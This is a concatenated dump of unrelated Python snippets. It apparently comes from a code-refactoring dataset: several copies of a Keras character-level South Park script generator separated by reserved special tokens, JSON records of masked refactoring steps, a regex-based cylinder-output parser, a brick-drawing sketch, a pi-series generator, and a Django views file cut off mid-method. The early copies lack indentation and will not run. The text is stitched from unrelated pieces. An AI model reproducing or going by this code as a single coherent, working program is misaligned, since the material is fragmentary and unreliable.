prev_char = next_char
next_char = sample(model, seed_text, charset, temp=0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp=1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding='post', maxlen=64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature=1.0):
if temperature <= 0.0:
return np.argmax(results)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p=probs)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['KERAS_BACKEND'] = 'tensorflow'
<|reserved_special_token_0|>
MODEL_NAME = 'script_gen_demo_model'
def main():
print('Loading model...')
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input('Enter a String: ').strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp=0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp=1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding='post', maxlen=64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature=1.0):
if temperature <= 0.0:
return np.argmax(results)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p=probs)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['KERAS_BACKEND'] = 'tensorflow'
import numpy as np
import sys
from util import load_model
from keras.preprocessing.text import hashing_trick
from keras.preprocessing.sequence import pad_sequences
from southpark.southpark_generative import string_one_hot, char_one_hot
MODEL_NAME = 'script_gen_demo_model'
def main():
print('Loading model...')
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input('Enter a String: ').strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp=0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp=1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding='post', maxlen=64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature=1.0):
if temperature <= 0.0:
return np.argmax(results)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p=probs)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#!/usr/bin/python3
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'
os.environ['KERAS_BACKEND'] = 'tensorflow'
import numpy as np
import sys
from util import load_model
from keras.preprocessing.text import hashing_trick
from keras.preprocessing.sequence import pad_sequences
from southpark.southpark_generative import string_one_hot, char_one_hot
MODEL_NAME = "script_gen_demo_model"
def main():
print("Loading model...")
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input("Enter a String: ").strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp = 0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp = 1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding = 'post', maxlen = 64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature = 1.0):
# helper function to sample an index from a probability array
if temperature <= 0.0:
return np.argmax(results)
#num_choices = results.shape[0] # (batch, outputs)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p = probs)
#preds = np.asarray(preds).astype('float64')
#preds = np.log(preds) / temperature
#exp_preds = np.exp(preds)
#preds = exp_preds / np.sum(exp_preds)
#probas = np.random.multinomial(1, preds, 1)
#
#print(probas)
#return np.argmax(probas)
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "ed7b29a4d7f3a48884434373418c3528f2f397ac",
"index": 271,
"step-1": "<mask token>\n\n\ndef main():\n print('Loading model...')\n model, charset = load_model(MODEL_NAME)\n print(charset)\n seed_text = input('Enter a String: ').strip()\n print()\n generate_script(seed_text, model, charset)\n\n\ndef generate_script(seed_text, model, charset):\n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp=0.2)\n sys.stdout.write(next_char)\n sys.stdout.flush()\n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n\ndef sample(model, string, charset, temp=1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding='post', maxlen=64)\n preds = model.predict(inputs)[0]\n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature=1.0):\n if temperature <= 0.0:\n return np.argmax(results)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p=probs)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n print('Loading model...')\n model, charset = load_model(MODEL_NAME)\n print(charset)\n seed_text = input('Enter a String: ').strip()\n print()\n generate_script(seed_text, model, charset)\n\n\ndef generate_script(seed_text, model, charset):\n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp=0.2)\n sys.stdout.write(next_char)\n sys.stdout.flush()\n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n\ndef sample(model, string, charset, temp=1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding='post', maxlen=64)\n preds = model.predict(inputs)[0]\n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature=1.0):\n if temperature <= 0.0:\n return np.argmax(results)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p=probs)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ['KERAS_BACKEND'] = 'tensorflow'\n<mask token>\nMODEL_NAME = 'script_gen_demo_model'\n\n\ndef main():\n print('Loading model...')\n model, charset = load_model(MODEL_NAME)\n print(charset)\n seed_text = input('Enter a String: ').strip()\n print()\n generate_script(seed_text, model, charset)\n\n\ndef generate_script(seed_text, model, charset):\n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp=0.2)\n sys.stdout.write(next_char)\n sys.stdout.flush()\n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n\ndef sample(model, string, charset, temp=1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding='post', maxlen=64)\n preds = model.predict(inputs)[0]\n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature=1.0):\n if temperature <= 0.0:\n return np.argmax(results)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p=probs)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ['KERAS_BACKEND'] = 'tensorflow'\nimport numpy as np\nimport sys\nfrom util import load_model\nfrom keras.preprocessing.text import hashing_trick\nfrom keras.preprocessing.sequence import pad_sequences\nfrom southpark.southpark_generative import string_one_hot, char_one_hot\nMODEL_NAME = 'script_gen_demo_model'\n\n\ndef main():\n print('Loading model...')\n model, charset = load_model(MODEL_NAME)\n print(charset)\n seed_text = input('Enter a String: ').strip()\n print()\n generate_script(seed_text, model, charset)\n\n\ndef generate_script(seed_text, model, charset):\n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp=0.2)\n sys.stdout.write(next_char)\n sys.stdout.flush()\n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n\ndef sample(model, string, charset, temp=1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding='post', maxlen=64)\n preds = model.predict(inputs)[0]\n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature=1.0):\n if temperature <= 0.0:\n return np.argmax(results)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p=probs)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/python3\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'\nos.environ['KERAS_BACKEND'] = 'tensorflow'\n\nimport numpy as np\nimport sys\n\nfrom util import load_model\nfrom keras.preprocessing.text import hashing_trick\nfrom keras.preprocessing.sequence import pad_sequences \n\nfrom southpark.southpark_generative import string_one_hot, char_one_hot\n\n\nMODEL_NAME = \"script_gen_demo_model\"\n\ndef main():\n print(\"Loading model...\") \n model, charset = load_model(MODEL_NAME)\n \n print(charset)\n\n seed_text = input(\"Enter a String: \").strip()\n print()\n generate_script(seed_text, model, charset)\n\ndef generate_script(seed_text, model, charset):\n \n sys.stdout.write(seed_text)\n sys.stdout.flush()\n next_char = None\n should_stop = False\n while not should_stop:\n prev_char = next_char\n next_char = sample(model, seed_text, charset, temp = 0.2)\n \n sys.stdout.write(next_char)\n sys.stdout.flush()\n \n if prev_char == '\\n' and prev_char == next_char:\n should_stop = True\n\n \ndef sample(model, string, charset, temp = 1.0):\n inputs = [string_one_hot(string, charset)]\n inputs = pad_sequences(inputs, padding = 'post', maxlen = 64)\n preds = model.predict(inputs)[0]\n \n return charset[sample_preds(preds, temp)]\n\n\ndef sample_preds(results, temperature = 1.0):\n # helper function to sample an index from a probability array\n\n if temperature <= 0.0:\n return np.argmax(results)\n \n #num_choices = results.shape[0] # (batch, outputs)\n probs = np.exp(np.log(results) / temperature)\n probs /= np.sum(probs)\n return np.random.choice(len(results), p = probs)\n\n\n #preds = np.asarray(preds).astype('float64')\n #preds = np.log(preds) / temperature\n #exp_preds = np.exp(preds)\n #preds = exp_preds / np.sum(exp_preds)\n #probas = np.random.multinomial(1, preds, 1)\n #\n #print(probas)\n\n #return np.argmax(probas)\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Zouts:
<|reserved_special_token_0|>
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Zout:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Zouts:
def __init__(self):
self.elements = []
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
def display(self):
for elem in self.elements:
print(elem.Var)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Zout:
<|reserved_special_token_0|>
def tozout(self, aline):
"""transform station statement to Cylinder Outputs struct"""
pattern = re.compile(
'.*(?P<Var>A.*[sS]t(?P<StN>\\d+)_Y(?P<ZN>\\d+)_[24]_(?P<ZName>\\w+)_(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\s*\\).*'
)
match = pattern.match(aline)
if match:
self.Var = match.group('Var')
self.StN = match.group('StN')
self.ZN = match.group('ZN')
self.ZName = match.group('ZName')
self.Motion = match.group('Motion')
self.Motion = re.sub('^(up|down|left|right)$', '\\1ward', self.
Motion)
isgrippermatch = re.compile('.*(open|close).*').match(aline)
if isgrippermatch:
self.Ztype = 'gripper'
else:
self.Ztype = 'not gripper'
<|reserved_special_token_0|>
class Zouts:
def __init__(self):
self.elements = []
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
def display(self):
for elem in self.elements:
print(elem.Var)
<|reserved_special_token_1|>
import re
class Zout:
def __init__(self, aline):
self.Str = aline
self.Var = ''
self.StN = ''
self.ZN = ''
self.ZName = ''
self.Motion = ''
self.Ztype = ''
self.tozout(aline)
def tozout(self, aline):
"""transform station statement to Cylinder Outputs struct"""
pattern = re.compile(
'.*(?P<Var>A.*[sS]t(?P<StN>\\d+)_Y(?P<ZN>\\d+)_[24]_(?P<ZName>\\w+)_(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\s*\\).*'
)
match = pattern.match(aline)
if match:
self.Var = match.group('Var')
self.StN = match.group('StN')
self.ZN = match.group('ZN')
self.ZName = match.group('ZName')
self.Motion = match.group('Motion')
self.Motion = re.sub('^(up|down|left|right)$', '\\1ward', self.
Motion)
isgrippermatch = re.compile('.*(open|close).*').match(aline)
if isgrippermatch:
self.Ztype = 'gripper'
else:
self.Ztype = 'not gripper'
def display(self):
print(self.Var)
class Zouts:
def __init__(self):
self.elements = []
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
def display(self):
for elem in self.elements:
print(elem.Var)
<|reserved_special_token_1|>
import re
class Zout:
def __init__(self, aline):
self.Str = aline
self.Var = ''
self.StN = ''
self.ZN = ''
self.ZName = ''
self.Motion = ''
self.Ztype = ''
self.tozout(aline)
def tozout(self, aline):
"""transform station statement to Cylinder Outputs struct"""
# SetAusg(A120,5,A.St201_Y1_2_SwivelUnit_backward);
#front|back|up|down|left|right
pattern = re.compile(r'.*(?P<Var>A.*[sS]t(?P<StN>\d+)_Y(?P<ZN>\d+)_[24]_(?P<ZName>\w+)_'
r'(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\s*\).*')
match = pattern.match(aline)
if match:
#print('match')
self.Var = match.group('Var')
self.StN = match.group('StN')
self.ZN = match.group('ZN')
self.ZName = match.group('ZName')
self.Motion = match.group('Motion')
# if re.compile(r'^up|down|left|right$').match(self.Motion):
# self.Motion = self.Motion+'ward'
# obj = re.compile(r'up|down|left|right')
# if obj.match(self.Motion):
# print('match')
# self.Motion = obj.subn('ward',self.Motion)[0]
self.Motion = re.sub(r'^(up|down|left|right)$',r'\1ward', self.Motion)
isgrippermatch = re.compile(r'.*(open|close).*').match(aline)
if isgrippermatch:
self.Ztype = 'gripper'
else:
self.Ztype = 'not gripper'
def display(self):
print(self.Var)
class Zouts:
def __init__(self):
self.elements = []
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
def display(self):
for elem in self.elements:
print(elem.Var)
|
flexible
|
{
"blob_id": "71ebc6e9218085e887eda7843b5489837ed45c97",
"index": 880,
"step-1": "<mask token>\n\n\nclass Zouts:\n <mask token>\n\n def search(self, StN, ZN, Motion):\n for elem in self.elements:\n print('elem:')\n print(str(type(elem.StN)) + str(type(StN)))\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\n print('match')\n return elem\n print('not match')\n return None\n\n def add(self, zout):\n self.elements.append(zout)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Zout:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Zouts:\n\n def __init__(self):\n self.elements = []\n\n def search(self, StN, ZN, Motion):\n for elem in self.elements:\n print('elem:')\n print(str(type(elem.StN)) + str(type(StN)))\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\n print('match')\n return elem\n print('not match')\n return None\n\n def add(self, zout):\n self.elements.append(zout)\n\n def display(self):\n for elem in self.elements:\n print(elem.Var)\n",
"step-3": "<mask token>\n\n\nclass Zout:\n <mask token>\n\n def tozout(self, aline):\n \"\"\"transform station statement to Cylinder Outputs struct\"\"\"\n pattern = re.compile(\n '.*(?P<Var>A.*[sS]t(?P<StN>\\\\d+)_Y(?P<ZN>\\\\d+)_[24]_(?P<ZName>\\\\w+)_(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\\\s*\\\\).*'\n )\n match = pattern.match(aline)\n if match:\n self.Var = match.group('Var')\n self.StN = match.group('StN')\n self.ZN = match.group('ZN')\n self.ZName = match.group('ZName')\n self.Motion = match.group('Motion')\n self.Motion = re.sub('^(up|down|left|right)$', '\\\\1ward', self.\n Motion)\n isgrippermatch = re.compile('.*(open|close).*').match(aline)\n if isgrippermatch:\n self.Ztype = 'gripper'\n else:\n self.Ztype = 'not gripper'\n <mask token>\n\n\nclass Zouts:\n\n def __init__(self):\n self.elements = []\n\n def search(self, StN, ZN, Motion):\n for elem in self.elements:\n print('elem:')\n print(str(type(elem.StN)) + str(type(StN)))\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\n print('match')\n return elem\n print('not match')\n return None\n\n def add(self, zout):\n self.elements.append(zout)\n\n def display(self):\n for elem in self.elements:\n print(elem.Var)\n",
"step-4": "import re\n\n\nclass Zout:\n\n def __init__(self, aline):\n self.Str = aline\n self.Var = ''\n self.StN = ''\n self.ZN = ''\n self.ZName = ''\n self.Motion = ''\n self.Ztype = ''\n self.tozout(aline)\n\n def tozout(self, aline):\n \"\"\"transform station statement to Cylinder Outputs struct\"\"\"\n pattern = re.compile(\n '.*(?P<Var>A.*[sS]t(?P<StN>\\\\d+)_Y(?P<ZN>\\\\d+)_[24]_(?P<ZName>\\\\w+)_(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\\\s*\\\\).*'\n )\n match = pattern.match(aline)\n if match:\n self.Var = match.group('Var')\n self.StN = match.group('StN')\n self.ZN = match.group('ZN')\n self.ZName = match.group('ZName')\n self.Motion = match.group('Motion')\n self.Motion = re.sub('^(up|down|left|right)$', '\\\\1ward', self.\n Motion)\n isgrippermatch = re.compile('.*(open|close).*').match(aline)\n if isgrippermatch:\n self.Ztype = 'gripper'\n else:\n self.Ztype = 'not gripper'\n\n def display(self):\n print(self.Var)\n\n\nclass Zouts:\n\n def __init__(self):\n self.elements = []\n\n def search(self, StN, ZN, Motion):\n for elem in self.elements:\n print('elem:')\n print(str(type(elem.StN)) + str(type(StN)))\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\n print('match')\n return elem\n print('not match')\n return None\n\n def add(self, zout):\n self.elements.append(zout)\n\n def display(self):\n for elem in self.elements:\n print(elem.Var)\n",
"step-5": "import re\r\n\r\nclass Zout:\r\n def __init__(self, aline):\r\n self.Str = aline\r\n self.Var = ''\r\n self.StN = ''\r\n self.ZN = ''\r\n self.ZName = ''\r\n self.Motion = ''\r\n self.Ztype = ''\r\n self.tozout(aline)\r\n\r\n def tozout(self, aline):\r\n \"\"\"transform station statement to Cylinder Outputs struct\"\"\"\r\n # SetAusg(A120,5,A.St201_Y1_2_SwivelUnit_backward);\r\n #front|back|up|down|left|right\r\n pattern = re.compile(r'.*(?P<Var>A.*[sS]t(?P<StN>\\d+)_Y(?P<ZN>\\d+)_[24]_(?P<ZName>\\w+)_'\r\n r'(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\s*\\).*')\r\n match = pattern.match(aline)\r\n if match:\r\n #print('match')\r\n self.Var = match.group('Var')\r\n self.StN = match.group('StN')\r\n self.ZN = match.group('ZN')\r\n self.ZName = match.group('ZName')\r\n self.Motion = match.group('Motion')\r\n # if re.compile(r'^up|down|left|right$').match(self.Motion):\r\n # self.Motion = self.Motion+'ward'\r\n # obj = re.compile(r'up|down|left|right')\r\n # if obj.match(self.Motion):\r\n # print('match')\r\n # self.Motion = obj.subn('ward',self.Motion)[0]\r\n self.Motion = re.sub(r'^(up|down|left|right)$',r'\\1ward', self.Motion)\r\n isgrippermatch = re.compile(r'.*(open|close).*').match(aline)\r\n if isgrippermatch:\r\n self.Ztype = 'gripper'\r\n else:\r\n self.Ztype = 'not gripper'\r\n\r\n def display(self):\r\n print(self.Var)\r\n\r\nclass Zouts:\r\n def __init__(self):\r\n self.elements = []\r\n\r\n def search(self, StN, ZN, Motion):\r\n for elem in self.elements:\r\n print('elem:')\r\n print(str(type(elem.StN)) + str(type(StN)))\r\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\r\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\r\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\r\n print('match')\r\n return elem\r\n print('not match')\r\n return None\r\n\r\n def add(self, zout):\r\n self.elements.append(zout)\r\n\r\n def display(self):\r\n for elem in self.elements:\r\n print(elem.Var)",
"step-ids": [
3,
6,
7,
10,
11
]
}
|
[
3,
6,
7,
10,
11
] |
class Rect():
def __init__(self, w, h):
self.w = w
self.h = h
def half(self):
return self.w / 2;
bricks = [Rect(40, 25), Rect(30, 25), Rect(28, 25), Rect(13, 25)]
def setup():
size(500, 500)
noLoop()
def draw():
posx = 0
posy = 0
i = 0
for y in range(20):
posx = 0
for x in range(50):
fill(random(100, 250))
brick = get_brick(i)
rect(posx, posy, brick.w, brick.h)
posx += brick.w
i += 1
posy += brick.h
def get_brick(index):
i = int(random(len(bricks)))
# i = index % len(bricks)
return bricks[i]
|
normal
|
{
"blob_id": "807f0094a9736abdfa3f5b629615a80f1e0d13ef",
"index": 3037,
"step-1": "class Rect:\n\n def __init__(self, w, h):\n self.w = w\n self.h = h\n\n def half(self):\n return self.w / 2\n\n\n<mask token>\n\n\ndef setup():\n size(500, 500)\n noLoop()\n\n\n<mask token>\n",
"step-2": "class Rect:\n\n def __init__(self, w, h):\n self.w = w\n self.h = h\n\n def half(self):\n return self.w / 2\n\n\n<mask token>\n\n\ndef setup():\n size(500, 500)\n noLoop()\n\n\ndef draw():\n posx = 0\n posy = 0\n i = 0\n for y in range(20):\n posx = 0\n for x in range(50):\n fill(random(100, 250))\n brick = get_brick(i)\n rect(posx, posy, brick.w, brick.h)\n posx += brick.w\n i += 1\n posy += brick.h\n\n\n<mask token>\n",
"step-3": "class Rect:\n\n def __init__(self, w, h):\n self.w = w\n self.h = h\n\n def half(self):\n return self.w / 2\n\n\n<mask token>\n\n\ndef setup():\n size(500, 500)\n noLoop()\n\n\ndef draw():\n posx = 0\n posy = 0\n i = 0\n for y in range(20):\n posx = 0\n for x in range(50):\n fill(random(100, 250))\n brick = get_brick(i)\n rect(posx, posy, brick.w, brick.h)\n posx += brick.w\n i += 1\n posy += brick.h\n\n\ndef get_brick(index):\n i = int(random(len(bricks)))\n return bricks[i]\n",
"step-4": "class Rect:\n\n def __init__(self, w, h):\n self.w = w\n self.h = h\n\n def half(self):\n return self.w / 2\n\n\nbricks = [Rect(40, 25), Rect(30, 25), Rect(28, 25), Rect(13, 25)]\n\n\ndef setup():\n size(500, 500)\n noLoop()\n\n\ndef draw():\n posx = 0\n posy = 0\n i = 0\n for y in range(20):\n posx = 0\n for x in range(50):\n fill(random(100, 250))\n brick = get_brick(i)\n rect(posx, posy, brick.w, brick.h)\n posx += brick.w\n i += 1\n posy += brick.h\n\n\ndef get_brick(index):\n i = int(random(len(bricks)))\n return bricks[i]\n",
"step-5": "class Rect():\n def __init__(self, w, h):\n self.w = w\n self.h = h\n \n def half(self):\n return self.w / 2;\n \nbricks = [Rect(40, 25), Rect(30, 25), Rect(28, 25), Rect(13, 25)]\n\ndef setup():\n size(500, 500)\n noLoop()\n \ndef draw():\n \n posx = 0\n posy = 0\n i = 0\n for y in range(20):\n posx = 0\n for x in range(50):\n fill(random(100, 250))\n brick = get_brick(i)\n rect(posx, posy, brick.w, brick.h)\n posx += brick.w\n i += 1\n posy += brick.h\n\ndef get_brick(index):\n i = int(random(len(bricks)))\n# i = index % len(bricks)\n return bricks[i]\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
def odds():
n = 1
while True:
yield n
n += 2
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def odds():
n = 1
while True:
yield n
n += 2
def pi_series():
odd_nums = odds()
approximation = 0
while True:
approximation += 4 / next(odd_nums)
yield approximation
approximation -= 4 / next(odd_nums)
yield approximation
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def odds():
n = 1
while True:
yield n
n += 2
def pi_series():
odd_nums = odds()
approximation = 0
while True:
approximation += 4 / next(odd_nums)
yield approximation
approximation -= 4 / next(odd_nums)
yield approximation
<|reserved_special_token_0|>
for x in range(10000):
print(next(approx_pi))
<|reserved_special_token_1|>
def odds():
n = 1
while True:
yield n
n += 2
def pi_series():
odd_nums = odds()
approximation = 0
while True:
approximation += 4 / next(odd_nums)
yield approximation
approximation -= 4 / next(odd_nums)
yield approximation
approx_pi = pi_series()
for x in range(10000):
print(next(approx_pi))
<|reserved_special_token_1|>
# Generates an infinite series of odd numbers
def odds():
n = 1
while True:
yield n
n += 2
def pi_series():
odd_nums = odds()
approximation = 0
while True:
approximation += (4 / next(odd_nums))
yield approximation
approximation -= (4 / next(odd_nums))
yield approximation
approx_pi = pi_series()
# The higher the range used here the closer to an acurate approximation of PI.
for x in range(10000):
print(next(approx_pi))
|
flexible
|
{
"blob_id": "26ef7de89e2e38c419310cc66a33d5dc0575fc0d",
"index": 5012,
"step-1": "def odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\n<mask token>\n",
"step-2": "def odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\ndef pi_series():\n odd_nums = odds()\n approximation = 0\n while True:\n approximation += 4 / next(odd_nums)\n yield approximation\n approximation -= 4 / next(odd_nums)\n yield approximation\n\n\n<mask token>\n",
"step-3": "def odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\ndef pi_series():\n odd_nums = odds()\n approximation = 0\n while True:\n approximation += 4 / next(odd_nums)\n yield approximation\n approximation -= 4 / next(odd_nums)\n yield approximation\n\n\n<mask token>\nfor x in range(10000):\n print(next(approx_pi))\n",
"step-4": "def odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\ndef pi_series():\n odd_nums = odds()\n approximation = 0\n while True:\n approximation += 4 / next(odd_nums)\n yield approximation\n approximation -= 4 / next(odd_nums)\n yield approximation\n\n\napprox_pi = pi_series()\nfor x in range(10000):\n print(next(approx_pi))\n",
"step-5": "# Generates an infinite series of odd numbers\ndef odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\ndef pi_series():\n odd_nums = odds()\n approximation = 0\n while True:\n approximation += (4 / next(odd_nums))\n yield approximation\n approximation -= (4 / next(odd_nums))\n yield approximation\n\napprox_pi = pi_series()\n\n# The higher the range used here the closer to an acurate approximation of PI.\nfor x in range(10000):\n print(next(approx_pi))\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from django.db.models import Count
from django.db.models import QuerySet
from django.db import connection
from django.core.paginator import Paginator, PageNotAnInteger
from django.http import HttpResponse
from django.http import HttpResponsePermanentRedirect
import datetime
import os
import json
from ctobservatory.settings import BASE_DIR
from .models import *
from notification.forms import SubscribeUnsubscribeForm
#from .issuefinder import *
import observer.issuefinder as issuefinder
from django.template.defaulttags import register
import hashlib
import psycopg2
ITEMS_PER_PAGE = 50
@register.filter
def get_item(dictionary, key):
return dictionary.get(key)
class FastCountQuerySet():
def __init__(self, queryset, tablename):
self.queryset = queryset
self.tablename = tablename
def count(self):
cursor = connection.cursor()
